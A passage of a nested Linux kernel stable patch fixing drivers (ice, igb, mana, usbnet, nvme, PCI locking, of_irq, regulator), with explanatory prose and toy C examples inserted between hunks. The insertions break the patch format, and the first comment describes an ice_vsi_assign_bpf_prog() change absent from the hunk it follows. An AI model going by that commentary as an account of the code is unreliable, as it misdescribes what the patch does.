+@@ -7322,18 +7343,6 @@ static void ice_rebuild(struct ice_pf *pf, enum ice_reset_req reset_type)
+ 	dev_err(dev, "Rebuild failed, unload and reload driver\n");
+ }
+ 
+-/**
+- * ice_max_xdp_frame_size - returns the maximum allowed frame size for XDP
+- * @vsi: Pointer to VSI structure
+- */
+-static int ice_max_xdp_frame_size(struct ice_vsi *vsi)
+-{
+-	if (test_bit(ICE_FLAG_LEGACY_RX, vsi->back->flags))
+-		return ICE_RXBUF_1664;
+-	else
+-		return ICE_RXBUF_3072;
+-}
+-
+ /**
+  * ice_change_mtu - NDO callback to change the MTU
+  * @netdev: network interface device structure
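
The reordering inside ice_vsi_assign_bpf_prog() is the important part of this hunk: the reference dropped by bpf_prog_put() may be the last one, so it must only be released after every Rx ring has been repointed at the new program; otherwise a ring could briefly reference freed memory. A generic publish-then-release sketch of the same ordering with a toy refcount (hypothetical types, single-threaded for brevity):

#include <stdlib.h>
#include <stdio.h>

/* Hypothetical refcounted object standing in for a bpf_prog. */
struct prog {
	int refcnt;
	int id;
};

static void prog_put(struct prog *p)
{
	if (p && --p->refcnt == 0) {
		printf("freeing prog %d\n", p->id);
		free(p);
	}
}

static void assign_prog(struct prog **rings, int n, struct prog **cur, struct prog *next)
{
	struct prog *old = *cur;

	*cur = next;

	/* Publish the new program to every consumer first... */
	for (int i = 0; i < n; i++)
		rings[i] = next;

	/* ...and only then drop the potentially-final reference to the
	 * old one. Doing the put first (the original bug) would let a
	 * ring point at freed memory until the loop caught up.
	 */
	prog_put(old);
}

int main(void)
{
	struct prog *old = malloc(sizeof(*old)), *cur;
	struct prog *rings[2];

	old->refcnt = 1;
	old->id = 1;
	cur = old;
	rings[0] = rings[1] = old;

	assign_prog(rings, 2, &cur, NULL);	/* detach: swap in NULL, free old */
	return 0;
}
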
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 81d9a5338be5e..76bd41058f3a9 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -6925,10 +6925,20 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 
+ static void igb_tsync_interrupt(struct igb_adapter *adapter)
+ {
++	const u32 mask = (TSINTR_SYS_WRAP | E1000_TSICR_TXTS |
++			  TSINTR_TT0 | TSINTR_TT1 |
++			  TSINTR_AUTT0 | TSINTR_AUTT1);
+ 	struct e1000_hw *hw = &adapter->hw;
+ 	u32 tsicr = rd32(E1000_TSICR);
+ 	struct ptp_clock_event event;
+ 
++	if (hw->mac.type == e1000_82580) {
++		/* 82580 has a hardware bug that requires an explicit
++		 * write to clear the TimeSync interrupt cause.
++		 */
++		wr32(E1000_TSICR, tsicr & mask);
++	}
++
+ 	if (tsicr & TSINTR_SYS_WRAP) {
+ 		event.type = PTP_CLOCK_PPS;
+ 		if (adapter->ptp_caps.pps)
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 39f8f28288aaa..6ae2d0b723c82 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -7063,6 +7063,7 @@ static void igc_io_resume(struct pci_dev *pdev)
+ 	rtnl_lock();
+ 	if (netif_running(netdev)) {
+ 		if (igc_open(netdev)) {
++			rtnl_unlock();
+ 			netdev_err(netdev, "igc_open failed after reset\n");
+ 			return;
+ 		}
+diff --git a/drivers/net/ethernet/microsoft/mana/mana.h b/drivers/net/ethernet/microsoft/mana/mana.h
+index 41c99eabf40a0..2b00d6a291171 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana.h
++++ b/drivers/net/ethernet/microsoft/mana/mana.h
+@@ -86,6 +86,8 @@ struct mana_txq {
+ 
+ 	atomic_t pending_sends;
+ 
++	bool napi_initialized;
++
+ 	struct mana_stats_tx stats;
+ };
+ 
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index e7d1ce68f05e3..b52612eef0a60 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -1391,10 +1391,12 @@ static void mana_destroy_txq(struct mana_port_context *apc)
+ 
+ 	for (i = 0; i < apc->num_queues; i++) {
+ 		napi = &apc->tx_qp[i].tx_cq.napi;
+-		napi_synchronize(napi);
+-		napi_disable(napi);
+-		netif_napi_del(napi);
+-
++		if (apc->tx_qp[i].txq.napi_initialized) {
++			napi_synchronize(napi);
++			napi_disable(napi);
++			netif_napi_del(napi);
++			apc->tx_qp[i].txq.napi_initialized = false;
++		}
+ 		mana_destroy_wq_obj(apc, GDMA_SQ, apc->tx_qp[i].tx_object);
+ 
+ 		mana_deinit_cq(apc, &apc->tx_qp[i].tx_cq);
+@@ -1450,6 +1452,7 @@ static int mana_create_txq(struct mana_port_context *apc,
+ 		txq->ndev = net;
+ 		txq->net_txq = netdev_get_tx_queue(net, i);
+ 		txq->vp_offset = apc->tx_vp_offset;
++		txq->napi_initialized = false;
+ 		skb_queue_head_init(&txq->pending_skbs);
+ 
+ 		memset(&spec, 0, sizeof(spec));
+@@ -1514,6 +1517,7 @@ static int mana_create_txq(struct mana_port_context *apc,
+ 
+ 		netif_napi_add_tx(net, &cq->napi, mana_poll);
+ 		napi_enable(&cq->napi);
++		txq->napi_initialized = true;
+ 
+ 		mana_gd_ring_cq(cq->gdma_cq, SET_ARM_BIT);
+ 	}
+@@ -1525,7 +1529,7 @@ static int mana_create_txq(struct mana_port_context *apc,
+ }
+ 
+ static void mana_destroy_rxq(struct mana_port_context *apc,
+-			     struct mana_rxq *rxq, bool validate_state)
++			     struct mana_rxq *rxq, bool napi_initialized)
+ 
+ {
+ 	struct gdma_context *gc = apc->ac->gdma_dev->gdma_context;
+@@ -1539,15 +1543,15 @@ static void mana_destroy_rxq(struct mana_port_context *apc,
+ 
+ 	napi = &rxq->rx_cq.napi;
+ 
+-	if (validate_state)
++	if (napi_initialized) {
+ 		napi_synchronize(napi);
+ 
+-	napi_disable(napi);
++		napi_disable(napi);
+ 
++		netif_napi_del(napi);
++	}
+ 	xdp_rxq_info_unreg(&rxq->xdp_rxq);
+ 
+-	netif_napi_del(napi);
+-
+ 	mana_destroy_wq_obj(apc, GDMA_RQ, rxq->rxobj);
+ 
+ 	mana_deinit_cq(apc, &rxq->rx_cq);
+diff --git a/drivers/net/mctp/mctp-serial.c b/drivers/net/mctp/mctp-serial.c
+index 9f9eaf896047c..fae9628f9615f 100644
+--- a/drivers/net/mctp/mctp-serial.c
++++ b/drivers/net/mctp/mctp-serial.c
+@@ -91,8 +91,8 @@ static int next_chunk_len(struct mctp_serial *dev)
+ 	 * will be those non-escaped bytes, and does not include the escaped
+ 	 * byte.
+ 	 */
+-	for (i = 1; i + dev->txpos + 1 < dev->txlen; i++) {
+-		if (needs_escape(dev->txbuf[dev->txpos + i + 1]))
++	for (i = 1; i + dev->txpos < dev->txlen; i++) {
++		if (needs_escape(dev->txbuf[dev->txpos + i]))
+ 			break;
+ 	}
+ 
+diff --git a/drivers/net/usb/ipheth.c b/drivers/net/usb/ipheth.c
+index 6a769df0b4213..13381d87eeb09 100644
+--- a/drivers/net/usb/ipheth.c
++++ b/drivers/net/usb/ipheth.c
+@@ -353,8 +353,8 @@ static int ipheth_close(struct net_device *net)
+ {
+ 	struct ipheth_device *dev = netdev_priv(net);
+ 
+-	cancel_delayed_work_sync(&dev->carrier_work);
+ 	netif_stop_queue(net);
++	cancel_delayed_work_sync(&dev->carrier_work);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/usb/usbnet.c b/drivers/net/usb/usbnet.c
+index 405e588f8a3a5..0f848d3185443 100644
+--- a/drivers/net/usb/usbnet.c
++++ b/drivers/net/usb/usbnet.c
+@@ -61,9 +61,6 @@
+ 
+ /*-------------------------------------------------------------------------*/
+ 
+-// randomly generated ethernet address
+-static u8	node_id [ETH_ALEN];
+-
+ /* use ethtool to change the level for any given device */
+ static int msg_level = -1;
+ module_param (msg_level, int, 0);
+@@ -1726,7 +1723,6 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 
+ 	dev->net = net;
+ 	strscpy(net->name, "usb%d", sizeof(net->name));
+-	eth_hw_addr_set(net, node_id);
+ 
+ 	/* rx and tx sides can use different message sizes;
+ 	 * bind() should set rx_urb_size in that case.
+@@ -1800,9 +1796,9 @@ usbnet_probe (struct usb_interface *udev, const struct usb_device_id *prod)
+ 		goto out4;
+ 	}
+ 
+-	/* let userspace know we have a random address */
+-	if (ether_addr_equal(net->dev_addr, node_id))
+-		net->addr_assign_type = NET_ADDR_RANDOM;
++	/* this flags the device for user space */
++	if (!is_valid_ether_addr(net->dev_addr))
++		eth_hw_addr_random(net);
+ 
+ 	if ((dev->driver_info->flags & FLAG_WLAN) != 0)
+ 		SET_NETDEV_DEVTYPE(net, &wlan_type);
+@@ -2212,7 +2208,6 @@ static int __init usbnet_init(void)
+ 	BUILD_BUG_ON(
+ 		sizeof_field(struct sk_buff, cb) < sizeof(struct skb_data));
+ 
+-	eth_random_addr(node_id);
+ 	return 0;
+ }
+ module_init(usbnet_init);
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c
+index a4034d44609b2..94b1e4f15b413 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/mac80211_if.c
+@@ -1089,6 +1089,7 @@ static int ieee_hw_init(struct ieee80211_hw *hw)
+ 	ieee80211_hw_set(hw, AMPDU_AGGREGATION);
+ 	ieee80211_hw_set(hw, SIGNAL_DBM);
+ 	ieee80211_hw_set(hw, REPORTS_TX_ACK_STATUS);
++	ieee80211_hw_set(hw, MFP_CAPABLE);
+ 
+ 	hw->extra_tx_headroom = brcms_c_get_header_len();
+ 	hw->queues = N_TX_QUEUES;
+diff --git a/drivers/net/wireless/marvell/mwifiex/main.h b/drivers/net/wireless/marvell/mwifiex/main.h
+index 63f861e6b28af..fb98eb342bd9a 100644
+--- a/drivers/net/wireless/marvell/mwifiex/main.h
++++ b/drivers/net/wireless/marvell/mwifiex/main.h
+@@ -1301,6 +1301,9 @@ mwifiex_get_priv_by_id(struct mwifiex_adapter *adapter,
+ 
+ 	for (i = 0; i < adapter->priv_num; i++) {
+ 		if (adapter->priv[i]) {
++			if (adapter->priv[i]->bss_mode == NL80211_IFTYPE_UNSPECIFIED)
++				continue;
++
+ 			if ((adapter->priv[i]->bss_num == bss_num) &&
+ 			    (adapter->priv[i]->bss_type == bss_type))
+ 				break;
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index c309709ac9b55..54a969aa72bed 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3107,6 +3107,17 @@ static unsigned long check_vendor_combination_bug(struct pci_dev *pdev)
+ 		    dmi_match(DMI_BOARD_NAME, "NS5x_7xPU") ||
+ 		    dmi_match(DMI_BOARD_NAME, "PH4PRX1_PH6PRX1"))
+ 			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
++	} else if (pdev->vendor == 0x144d && pdev->device == 0xa80d) {
++		/*
++		 * Exclude Samsung 990 Evo from NVME_QUIRK_SIMPLE_SUSPEND
++		 * because of high power consumption (> 2 Watt) in s2idle
++		 * sleep. Only some boards with Intel CPU are affected.
++		 */
++		if (dmi_match(DMI_BOARD_NAME, "GMxPXxx") ||
++		    dmi_match(DMI_BOARD_NAME, "PH4PG31") ||
++		    dmi_match(DMI_BOARD_NAME, "PH4PRX1_PH6PRX1") ||
++		    dmi_match(DMI_BOARD_NAME, "PH6PG01_PH6PG71"))
++			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
+ 	}
+ 
+ 	/*
+diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
+index 76b9eb438268f..81574500a57c7 100644
+--- a/drivers/nvme/target/tcp.c
++++ b/drivers/nvme/target/tcp.c
+@@ -1816,8 +1816,10 @@ static u16 nvmet_tcp_install_queue(struct nvmet_sq *sq)
+ 	}
+ 
+ 	queue->nr_cmds = sq->size * 2;
+-	if (nvmet_tcp_alloc_cmds(queue))
++	if (nvmet_tcp_alloc_cmds(queue)) {
++		queue->nr_cmds = 0;
+ 		return NVME_SC_INTERNAL;
++	}
+ 	return 0;
+ }
+ 
+diff --git a/drivers/nvmem/core.c b/drivers/nvmem/core.c
+index f060583941027..ad897b2c0b14c 100644
+--- a/drivers/nvmem/core.c
++++ b/drivers/nvmem/core.c
+@@ -1092,13 +1092,13 @@ void nvmem_device_put(struct nvmem_device *nvmem)
+ EXPORT_SYMBOL_GPL(nvmem_device_put);
+ 
+ /**
+- * devm_nvmem_device_get() - Get nvmem cell of device form a given id
++ * devm_nvmem_device_get() - Get nvmem device of device from a given id
+  *
+  * @dev: Device that requests the nvmem device.
+  * @id: name id for the requested nvmem device.
+  *
+- * Return: ERR_PTR() on error or a valid pointer to a struct nvmem_cell
+- * on success.  The nvmem_cell will be freed by the automatically once the
++ * Return: ERR_PTR() on error or a valid pointer to a struct nvmem_device
++ * on success.  The nvmem_device will be freed automatically once the
+  * device is freed.
+  */
+ struct nvmem_device *devm_nvmem_device_get(struct device *dev, const char *id)
+diff --git a/drivers/of/irq.c b/drivers/of/irq.c
+index 88c24d88c4b92..a8e306606c4bd 100644
+--- a/drivers/of/irq.c
++++ b/drivers/of/irq.c
+@@ -344,7 +344,8 @@ int of_irq_parse_one(struct device_node *device, int index, struct of_phandle_ar
+ 	struct device_node *p;
+ 	const __be32 *addr;
+ 	u32 intsize;
+-	int i, res;
++	int i, res, addr_len;
++	__be32 addr_buf[3] = { 0 };
+ 
+ 	pr_debug("of_irq_parse_one: dev=%pOF, index=%d\n", device, index);
+ 
+@@ -353,13 +354,19 @@ int of_irq_parse_one(struct device_node *device, int index, struct of_phandle_ar
+ 		return of_irq_parse_oldworld(device, index, out_irq);
+ 
+ 	/* Get the reg property (if any) */
+-	addr = of_get_property(device, "reg", NULL);
++	addr = of_get_property(device, "reg", &addr_len);
++
++	/* Prevent out-of-bounds read in case of longer interrupt parent address size */
++	if (addr_len > (3 * sizeof(__be32)))
++		addr_len = 3 * sizeof(__be32);
++	if (addr)
++		memcpy(addr_buf, addr, addr_len);
+ 
+ 	/* Try the new-style interrupts-extended first */
+ 	res = of_parse_phandle_with_args(device, "interrupts-extended",
+ 					"#interrupt-cells", index, out_irq);
+ 	if (!res)
+-		return of_irq_parse_raw(addr, out_irq);
++		return of_irq_parse_raw(addr_buf, out_irq);
+ 
+ 	/* Look for the interrupt parent. */
+ 	p = of_irq_find_parent(device);
+@@ -389,7 +396,7 @@ int of_irq_parse_one(struct device_node *device, int index, struct of_phandle_ar
+ 
+ 
+ 	/* Check if there are any interrupt-map translations to process */
+-	res = of_irq_parse_raw(addr, out_irq);
++	res = of_irq_parse_raw(addr_buf, out_irq);
+  out:
+ 	of_node_put(p);
+ 	return res;
+diff --git a/drivers/pci/controller/dwc/pci-keystone.c b/drivers/pci/controller/dwc/pci-keystone.c
+index 6007ffcb4752a..e738013c6d4f5 100644
+--- a/drivers/pci/controller/dwc/pci-keystone.c
++++ b/drivers/pci/controller/dwc/pci-keystone.c
+@@ -35,6 +35,11 @@
+ #define PCIE_DEVICEID_SHIFT	16
+ 
+ /* Application registers */
++#define PID				0x000
++#define RTL				GENMASK(15, 11)
++#define RTL_SHIFT			11
++#define AM6_PCI_PG1_RTL_VER		0x15
++
+ #define CMD_STATUS			0x004
+ #define LTSSM_EN_VAL		        BIT(0)
+ #define OB_XLAT_EN_VAL		        BIT(1)
+@@ -105,6 +110,8 @@
+ 
+ #define to_keystone_pcie(x)		dev_get_drvdata((x)->dev)
+ 
++#define PCI_DEVICE_ID_TI_AM654X		0xb00c
++
+ struct ks_pcie_of_data {
+ 	enum dw_pcie_device_mode mode;
+ 	const struct dw_pcie_host_ops *host_ops;
+@@ -519,7 +526,11 @@ static int ks_pcie_start_link(struct dw_pcie *pci)
+ static void ks_pcie_quirk(struct pci_dev *dev)
+ {
+ 	struct pci_bus *bus = dev->bus;
++	struct keystone_pcie *ks_pcie;
++	struct device *bridge_dev;
+ 	struct pci_dev *bridge;
++	u32 val;
++
+ 	static const struct pci_device_id rc_pci_devids[] = {
+ 		{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCIE_RC_K2HK),
+ 		 .class = PCI_CLASS_BRIDGE_PCI_NORMAL, .class_mask = ~0, },
+@@ -531,6 +542,11 @@ static void ks_pcie_quirk(struct pci_dev *dev)
+ 		 .class = PCI_CLASS_BRIDGE_PCI_NORMAL, .class_mask = ~0, },
+ 		{ 0, },
+ 	};
++	static const struct pci_device_id am6_pci_devids[] = {
++		{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_AM654X),
++		 .class = PCI_CLASS_BRIDGE_PCI << 8, .class_mask = ~0, },
++		{ 0, },
++	};
+ 
+ 	if (pci_is_root_bus(bus))
+ 		bridge = dev;
+@@ -552,10 +568,36 @@ static void ks_pcie_quirk(struct pci_dev *dev)
+ 	 */
+ 	if (pci_match_id(rc_pci_devids, bridge)) {
+ 		if (pcie_get_readrq(dev) > 256) {
+-			dev_info(&dev->dev, "limiting MRRS to 256\n");
++			dev_info(&dev->dev, "limiting MRRS to 256 bytes\n");
+ 			pcie_set_readrq(dev, 256);
+ 		}
+ 	}
++
++	/*
++	 * Memory transactions fail with PCI controller in AM654 PG1.0
++	 * when MRRS is set to more than 128 bytes. Force the MRRS to
++	 * 128 bytes in all downstream devices.
++	 */
++	if (pci_match_id(am6_pci_devids, bridge)) {
++		bridge_dev = pci_get_host_bridge_device(dev);
++		if (!bridge_dev || !bridge_dev->parent)
++			return;
++
++		ks_pcie = dev_get_drvdata(bridge_dev->parent);
++		if (!ks_pcie)
++			return;
++
++		val = ks_pcie_app_readl(ks_pcie, PID);
++		val &= RTL;
++		val >>= RTL_SHIFT;
++		if (val != AM6_PCI_PG1_RTL_VER)
++			return;
++
++		if (pcie_get_readrq(dev) > 128) {
++			dev_info(&dev->dev, "limiting MRRS to 128 bytes\n");
++			pcie_set_readrq(dev, 128);
++		}
++	}
+ }
+ DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, ks_pcie_quirk);
+ 
+diff --git a/drivers/pci/hotplug/pnv_php.c b/drivers/pci/hotplug/pnv_php.c
+index 881d420637bf1..092c9ac0d26d2 100644
+--- a/drivers/pci/hotplug/pnv_php.c
++++ b/drivers/pci/hotplug/pnv_php.c
+@@ -39,7 +39,6 @@ static void pnv_php_disable_irq(struct pnv_php_slot *php_slot,
+ 				bool disable_device)
+ {
+ 	struct pci_dev *pdev = php_slot->pdev;
+-	int irq = php_slot->irq;
+ 	u16 ctrl;
+ 
+ 	if (php_slot->irq > 0) {
+@@ -58,7 +57,7 @@ static void pnv_php_disable_irq(struct pnv_php_slot *php_slot,
+ 		php_slot->wq = NULL;
+ 	}
+ 
+-	if (disable_device || irq > 0) {
++	if (disable_device) {
+ 		if (pdev->msix_enabled)
+ 			pci_disable_msix(pdev);
+ 		else if (pdev->msi_enabled)
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 2d373ab3ccb38..f7592348ebeee 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -5584,10 +5584,12 @@ static void pci_bus_lock(struct pci_bus *bus)
+ {
+ 	struct pci_dev *dev;
+ 
++	pci_dev_lock(bus->self);
+ 	list_for_each_entry(dev, &bus->devices, bus_list) {
+-		pci_dev_lock(dev);
+ 		if (dev->subordinate)
+ 			pci_bus_lock(dev->subordinate);
++		else
++			pci_dev_lock(dev);
+ 	}
+ }
+ 
+@@ -5599,8 +5601,10 @@ static void pci_bus_unlock(struct pci_bus *bus)
+ 	list_for_each_entry(dev, &bus->devices, bus_list) {
+ 		if (dev->subordinate)
+ 			pci_bus_unlock(dev->subordinate);
+-		pci_dev_unlock(dev);
++		else
++			pci_dev_unlock(dev);
+ 	}
++	pci_dev_unlock(bus->self);
+ }
+ 
+ /* Return 1 on successful lock, 0 on contention */
+@@ -5608,15 +5612,15 @@ static int pci_bus_trylock(struct pci_bus *bus)
+ {
+ 	struct pci_dev *dev;
+ 
++	if (!pci_dev_trylock(bus->self))
++		return 0;
++
+ 	list_for_each_entry(dev, &bus->devices, bus_list) {
+-		if (!pci_dev_trylock(dev))
+-			goto unlock;
+ 		if (dev->subordinate) {
+-			if (!pci_bus_trylock(dev->subordinate)) {
+-				pci_dev_unlock(dev);
++			if (!pci_bus_trylock(dev->subordinate))
+ 				goto unlock;
+-			}
+-		}
++		} else if (!pci_dev_trylock(dev))
++			goto unlock;
+ 	}
+ 	return 1;
+ 
+@@ -5624,8 +5628,10 @@ static int pci_bus_trylock(struct pci_bus *bus)
+ 	list_for_each_entry_continue_reverse(dev, &bus->devices, bus_list) {
+ 		if (dev->subordinate)
+ 			pci_bus_unlock(dev->subordinate);
+-		pci_dev_unlock(dev);
++		else
++			pci_dev_unlock(dev);
+ 	}
++	pci_dev_unlock(bus->self);
+ 	return 0;
+ }
+ 
+@@ -5657,9 +5663,10 @@ static void pci_slot_lock(struct pci_slot *slot)
+ 	list_for_each_entry(dev, &slot->bus->devices, bus_list) {
+ 		if (!dev->slot || dev->slot != slot)
+ 			continue;
+-		pci_dev_lock(dev);
+ 		if (dev->subordinate)
+ 			pci_bus_lock(dev->subordinate);
++		else
++			pci_dev_lock(dev);
+ 	}
+ }
+ 
+@@ -5685,14 +5692,13 @@ static int pci_slot_trylock(struct pci_slot *slot)
+ 	list_for_each_entry(dev, &slot->bus->devices, bus_list) {
+ 		if (!dev->slot || dev->slot != slot)
+ 			continue;
+-		if (!pci_dev_trylock(dev))
+-			goto unlock;
+ 		if (dev->subordinate) {
+ 			if (!pci_bus_trylock(dev->subordinate)) {
+ 				pci_dev_unlock(dev);
+ 				goto unlock;
+ 			}
+-		}
++		} else if (!pci_dev_trylock(dev))
++			goto unlock;
+ 	}
+ 	return 1;
+ 
+@@ -5703,7 +5709,8 @@ static int pci_slot_trylock(struct pci_slot *slot)
+ 			continue;
+ 		if (dev->subordinate)
+ 			pci_bus_unlock(dev->subordinate);
+-		pci_dev_unlock(dev);
++		else
++			pci_dev_unlock(dev);
+ 	}
+ 	return 0;
+ }
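
After this change every level of the hierarchy takes the bridge's own lock exactly once before descending into its subordinate bus, and leaf devices are locked individually, giving a consistent parent-before-child lock order for lock, trylock and unlock alike. A toy recursive version over a two-level device tree with pthread mutexes (structure names hypothetical):

#include <pthread.h>
#include <stddef.h>

/* Hypothetical device tree node: a device with an optional subordinate
 * bus, mirroring pci_dev / pci_bus just enough to show the lock order.
 */
struct dev {
	pthread_mutex_t lock;
	struct dev *children;	/* subordinate bus devices, if a bridge */
	size_t nr_children;
};

static void bus_lock(struct dev *bridge)
{
	/* Lock the bridge first (parent before child)... */
	pthread_mutex_lock(&bridge->lock);

	/* ...then recurse into sub-bridges, or lock leaves directly. */
	for (size_t i = 0; i < bridge->nr_children; i++) {
		struct dev *d = &bridge->children[i];

		if (d->nr_children)
			bus_lock(d);
		else
			pthread_mutex_lock(&d->lock);
	}
}

static void bus_unlock(struct dev *bridge)
{
	for (size_t i = 0; i < bridge->nr_children; i++) {
		struct dev *d = &bridge->children[i];

		if (d->nr_children)
			bus_unlock(d);
		else
			pthread_mutex_unlock(&d->lock);
	}
	pthread_mutex_unlock(&bridge->lock);
}

int main(void)
{
	struct dev leaf = { PTHREAD_MUTEX_INITIALIZER, NULL, 0 };
	struct dev root = { PTHREAD_MUTEX_INITIALIZER, &leaf, 1 };

	bus_lock(&root);
	bus_unlock(&root);
	return 0;
}
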
+diff --git a/drivers/pcmcia/yenta_socket.c b/drivers/pcmcia/yenta_socket.c
+index 3966a6ceb1ac7..a1c16352c01c6 100644
+--- a/drivers/pcmcia/yenta_socket.c
++++ b/drivers/pcmcia/yenta_socket.c
+@@ -638,11 +638,11 @@ static int yenta_search_one_res(struct resource *root, struct resource *res,
+ 		start = PCIBIOS_MIN_CARDBUS_IO;
+ 		end = ~0U;
+ 	} else {
+-		unsigned long avail = root->end - root->start;
++		unsigned long avail = resource_size(root);
+ 		int i;
+ 		size = BRIDGE_MEM_MAX;
+-		if (size > avail/8) {
+-			size = (avail+1)/8;
++		if (size > (avail - 1) / 8) {
++			size = avail / 8;
+ 			/* round size down to next power of 2 */
+ 			i = 0;
+ 			while ((size /= 2) != 0)
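
resource_size() is end - start + 1, because kernel resource ranges are inclusive; the open-coded `root->end - root->start` was one byte short, and the adjusted /8 arithmetic compensates for the +1 now being inside avail. The off-by-one in isolation:

#include <assert.h>

struct resource {
	unsigned long start, end;	/* inclusive range, as in the kernel */
};

static unsigned long resource_size(const struct resource *res)
{
	return res->end - res->start + 1;
}

int main(void)
{
	/* A 4 KiB window: 0x1000..0x1fff inclusive. */
	struct resource res = { 0x1000, 0x1fff };

	assert(res.end - res.start == 0xfff);	/* old code: one byte short */
	assert(resource_size(&res) == 0x1000);	/* correct size */
	return 0;
}
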
+diff --git a/drivers/phy/xilinx/phy-zynqmp.c b/drivers/phy/xilinx/phy-zynqmp.c
+index ac9a9124a36de..cc36fb7616ae4 100644
+--- a/drivers/phy/xilinx/phy-zynqmp.c
++++ b/drivers/phy/xilinx/phy-zynqmp.c
+@@ -847,6 +847,7 @@ static struct phy *xpsgtr_xlate(struct device *dev,
+ 	phy_type = args->args[1];
+ 	phy_instance = args->args[2];
+ 
++	guard(mutex)(&gtr_phy->phy->mutex);
+ 	ret = xpsgtr_set_lane_type(gtr_phy, phy_type, phy_instance);
+ 	if (ret < 0) {
+ 		dev_err(gtr_dev->dev, "Invalid PHY type and/or instance\n");
+diff --git a/drivers/platform/x86/dell/dell-smbios-base.c b/drivers/platform/x86/dell/dell-smbios-base.c
+index 86b95206cb1bd..6fb538a138689 100644
+--- a/drivers/platform/x86/dell/dell-smbios-base.c
++++ b/drivers/platform/x86/dell/dell-smbios-base.c
+@@ -590,7 +590,10 @@ static int __init dell_smbios_init(void)
+ 	return 0;
+ 
+ fail_sysfs:
+-	free_group(platform_device);
++	if (!wmi)
++		exit_dell_smbios_wmi();
++	if (!smm)
++		exit_dell_smbios_smm();
+ 
+ fail_create_group:
+ 	platform_device_del(platform_device);
+diff --git a/drivers/regulator/of_regulator.c b/drivers/regulator/of_regulator.c
+index cd726d4e8fbfb..1b65e5e4e40ff 100644
+--- a/drivers/regulator/of_regulator.c
++++ b/drivers/regulator/of_regulator.c
+@@ -701,3 +701,95 @@ struct regulator_dev *of_parse_coupled_regulator(struct regulator_dev *rdev,
+ 
+ 	return c_rdev;
+ }
++
++/*
++ * Check if name is a supply name according to the '*-supply' pattern
++ * return 0 if false
++ * return length of supply name without the -supply
++ */
++static int is_supply_name(const char *name)
++{
++	int strs, i;
++
++	strs = strlen(name);
++	/* string need to be at minimum len(x-supply) */
++	if (strs < 8)
++		return 0;
++	for (i = strs - 6; i > 0; i--) {
++		/* find first '-' and check if right part is supply */
++		if (name[i] != '-')
++			continue;
++		if (strcmp(name + i + 1, "supply") != 0)
++			return 0;
++		return i;
++	}
++	return 0;
++}
++
++/*
++ * of_regulator_bulk_get_all - get multiple regulator consumers
++ *
++ * @dev:	Device to supply
++ * @np:		device node to search for consumers
++ * @consumers:  Configuration of consumers; clients are stored here.
++ *
++ * @return number of regulators on success, an errno on failure.
++ *
++ * This helper function allows drivers to get several regulator
++ * consumers in one operation.  If any of the regulators cannot be
++ * acquired then any regulators that were allocated will be freed
++ * before returning to the caller.
++ */
++int of_regulator_bulk_get_all(struct device *dev, struct device_node *np,
++			      struct regulator_bulk_data **consumers)
++{
++	int num_consumers = 0;
++	struct regulator *tmp;
++	struct property *prop;
++	int i, n = 0, ret;
++	char name[64];
++
++	*consumers = NULL;
++
++	/*
++	 * first pass: count the xxx-supply properties
++	 * second pass: fill consumers
++	 */
++restart:
++	for_each_property_of_node(np, prop) {
++		i = is_supply_name(prop->name);
++		if (i == 0)
++			continue;
++		if (!*consumers) {
++			num_consumers++;
++			continue;
++		} else {
++			memcpy(name, prop->name, i);
++			name[i] = '\0';
++			tmp = regulator_get(dev, name);
++			if (IS_ERR(tmp)) {
++				ret = -EINVAL;
++				goto error;
++			}
++			(*consumers)[n].consumer = tmp;
++			n++;
++			continue;
++		}
++	}
++	if (*consumers)
++		return num_consumers;
++	if (num_consumers == 0)
++		return 0;
++	*consumers = kmalloc_array(num_consumers,
++				   sizeof(struct regulator_bulk_data),
++				   GFP_KERNEL);
++	if (!*consumers)
++		return -ENOMEM;
++	goto restart;
++
++error:
++	while (--n >= 0)
++		regulator_put((*consumers)[n].consumer);
++	kfree(*consumers);
++	*consumers = NULL;
++	return ret;
++}
++EXPORT_SYMBOL_GPL(of_regulator_bulk_get_all);
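
A consumer of the new helper might look roughly like the sketch below (driver boilerplate omitted, names hypothetical): the caller passes its device node, receives a freshly allocated regulator_bulk_data array, and stays responsible for putting the regulators and freeing the array:

	struct regulator_bulk_data *consumers;
	int num, ret;

	num = of_regulator_bulk_get_all(dev, dev->of_node, &consumers);
	if (num <= 0)
		return num;			/* no supplies, or an error */

	ret = regulator_bulk_enable(num, consumers);
	if (ret) {
		regulator_bulk_free(num, consumers);	/* regulator_put() each */
		kfree(consumers);
		return ret;
	}
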
+diff --git a/drivers/spi/spi-rockchip.c b/drivers/spi/spi-rockchip.c
+index 79242dc5272de..dbefc7e77313f 100644
